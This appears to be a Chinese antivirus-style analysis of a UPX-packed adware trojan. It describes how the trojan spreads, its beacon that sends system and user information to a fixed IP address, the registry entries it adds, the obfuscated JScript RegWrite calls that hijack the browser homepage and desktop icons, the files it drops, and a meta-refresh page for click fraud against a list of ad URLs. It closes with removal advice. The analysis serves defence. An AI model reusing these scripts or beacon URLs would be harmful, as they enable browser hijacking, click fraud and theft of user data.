该样本是使用“C/C++ ”编写的木马程序，由"UPX"加壳。长度为“40,448”字节，图标为“  ”，病毒扩展名为“exe”，主要通过“文件捆绑”、“下载器下载”、“网页挂马”、“可移动存储设备感染”等方式传播，病毒主要目的点击广告以获取利益。
　　病毒通过程序图标诱骗用户点击运行，用户中毒后，会出现系统运行缓慢、存在大量未知可疑进程、网络堵塞、出现大量广告程序等现象。
病毒具体行为:
首先获取电脑的版本信息，并发送到黑客设定的指定页。
-----------------------------------------------------------
获取系统信息发到指定网站，创建注册表修改主页，获取iexplore.exe路径，打开IE
http://58.218.198.119:8080/count.aspmac=****&os=****&flag=****&user=****"
 注册表行为:
 添加的注册表：
------------------------------------------------------------------
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\fonfile\ScriptEngine]
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\iiifile\ScriptEngine]
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Frist]    //修改主页
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\fonfile\DefaultIcon]
@="C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\fonfile\shell\open\command]
@="C:\\Program Files\\Thunder\\Update.exe \"%1\" %*"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\iiifile\DefaultIcon]
@="\"C:\\Program Files\\NetMeeting\\conf.exe\",1"
@="C:\\WINDOWS\\Downloaded Program Files\\taobao.ico"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\iiifile\shell\open\command]
@="\"rundll32.exe\" msconf.dll,NewMediaPhone %l"
@="C:\\Program Files\\Thunder\\Update.exe \"%1\" %*"
--------------------------------------------------------------------------
注册表是利用脚本写上去的,脚本如下
写注册表脚本:
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}r"...

"try{P.RegWrite("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\HideDesktopIcons\\NewStartPanel\\{871C5380-42A0-1069-A2EA-

"try{P.RegWrite("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\HideDesktopIcons\\ClassicStartMenu\\{871C5380-42A0-1069-A2EA-08002B30309D}",1,"REG_DWORD");}catch(e){}
"

"try{P.RegWrite("HKEY_CLASSES_ROOT\\CLSID\\{86AEFBE8-763F-0647-899C-A93278894D8E}\\","Internet Exploer","REG_SZ");}catch(e){}
"

"try{P.RegWrite("HKEY_CLASSES_ROOT\\CLSID\\{86AEFBE8-763F-0647-899C-A93278894D8E}\\DefaultIcon\\", "C:\\Program Files\\Internet Explorer\\Iexplore.exe","REG_SZ");}catch(e){}
"

"try{P.RegWrite("HKEY_CLASSES_ROOT\\CLSID\\{86AEFBE8-763F-0647-899C-A93278894D8E}\\Shell\\","","REG_SZ");}catch(e){}
"

"try{P.RegWrite("HKEY_CLASSES_ROOT\\CLSID\\{86AEFBE8-763F-0647-899C-A93278894D8E}\\Shell\\D\\Command\\", "Rundll32.exe Shell32.dll,Control_RunDLL Inetcpl.cpl","REG_SZ");}catch(e){}
"

"try{P.RegWrite("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace\\{86AEFBE8-763F-0647-899C-A93278894D8E}\\","Internet Exploer","REG_SZ");}catch(e){}
"

"try{P.RegWrite("HKEY_CLASSES_ROOT\\CLSID\\{86AEFBE8-763F-0647-899C-A93278894D8E}\\ShellFolder\\","","REG_SZ");}catch(e){}
"

"try{P.RegWrite("HKEY_CLASSES_ROOT\\CLSID\\{86AEFBE8-763F-0647-899C-A93278894D8E}\\ShellFolder\\Attributes",10,"REG_DWORD");}catch(e){}
"

"try{P.RegWrite("HKEY_CLASSES_ROOT\\CLSID\\{86AEFBE8-763F-0647-899C-A93278894D8E}\\Shell\\Open\\Command\\", "C:\\Program Files\\Internet Explorer\\Iexplore.exe http://www.788dh.com/","REG_SZ");}catch(e){}
"

"eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}r"...

-------------------------------------------------------------------

文件行为：
-----------------------------------------------------------------
[新建] Documents and Settings\Administrator\mm.ico
[新建] Documents and Settings\Administrator\game.ico
[新建] Program Files\Internet Explorer\MUI
[新建] Program Files\Thunder\Update.exe
[新建] WINDOWS\Downloaded Program Files\taobao.ico
[新建] WINDOWS\Downloaded Program Files\Update.exe
[新建] Documents and Settings\Robey\桌面\在线小游戏.ani
[新建] Documents and Settings\Robey\桌面\淘宝网.iiis
[新建] Documents and Settings\Robey\Favorites\VANCL 凡客诚品
[新建] Documents and Settings\Robey\Favorites\最新极品绿色好的电影库免费.高清高速！天天更新!!.html
[新建] Documents and Settings\Robey\Favorites\中国福利彩票，体育彩票的投注中心.彩票大赢家！.html
[新建] Documents and Settings\Robey\Favorites\最新在线小说免费的阅读.丰富内容速度快的小说站!.html
[新建] Documents and Settings\Robey\Favorites\淘宝网 - 淘！我喜欢.html
[新建] Documents and Settings\Robey\Favorites\45575.com在线的小游戏.最好玩最新最快酷超级小游戏!.html
[新建] Documents and Settings\Robey\Favorites\当当网—网上购物中心.htmlx
[新建] Documents and Settings\Robey\Favorites\卓越亚马逊网上购物图书，手机，数码，家电，化妆品，钟表，首饰等在线销售.htmlód
[新建] Documents and Settings\Robey\Favorites\看看电视剧在线大全,,,最好绿色最新高速免费电视剧网站!.html
[新建] Documents and Settings\Robey\Favorites\美女丰胸大秘诀-20天内迅速增大大大!.html
[新建] Documents and Settings\Robey\Favorites\艾橙女装--最美丽时尚的女装品牌.美女买衣，秒杀艾橙女装!!.html
[新建] Documents and Settings\Robey\Favorites\链接\网址导航.html
[新建] Documents and Settings\Robey\Favorites\链接\福彩体彩.html
[新建] Documents and Settings\Robey\Favorites\链接\◆ 淘 宝 网 ◆.html
[新建] Documents and Settings\Robey\Favorites\链接\好玩小游戏.html
[新建] Documents and Settings\Robey\Favorites\链接\当当网.html
[新建] Documents and Settings\Robey\Favorites\链接\看电视剧.html
[新建] Documents and Settings\Robey\Favorites\链接\小说网.htmlp
[新建] Documents and Settings\Robey\Favorites\链接\单机游戏.html
[新建] Documents and Settings\Robey\Favorites\链接\网络电视.html
[新建] Documents and Settings\Robey\Favorites\链接\最快电影.html
[新建] Documents and Settings\Robey\Application Data\Microsoft\Internet Explorer\Quick Launch\启动 Internet Explorer 浏览器.fon

打开IE疯狂点击:
-------------------------------------------------------------
读写b.txt文件,每0.1秒刷新一次。
<html>
<head>
<meta http-equiv="Content-Language" content="zh-CN">
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=gb2312">
<meta http-equiv="refresh" content="0.1;url=http://www.92nimm.com/?fav"><title></title>//这个网页只是列表中的一个
</head>
<body>
</body>
</html>
被点击的网页列表
http://www.82vv.com/tb/?desk
http://www.82vv.com/tb/
http://www.lszxrj.com/?name=00012
http://www.82vv.com/2c/
http://www.51hjfx.com/?code=00012
http://www.lszxrj.com/?name=00012
http://www.45575.com/?desk
http://www.45575.com/?fa2
http://www.92nimm.com/?fav
http://www.82vv.com/cp/
http://www.82vv.com/dd/
http://www.82vv.com/zy/
http://www.bookxp.com/?fav
http://www.kkdsj.com/?fa2
http://www.kusila.com/?fa2
http://www.9ptv.com/?fa2
http://www.3234.com/?fav

--------------------------------------------------------------------------------
病毒清除：
由于病毒创建大量广告文件，修改主页。建议使用流氓软件清除工具扫描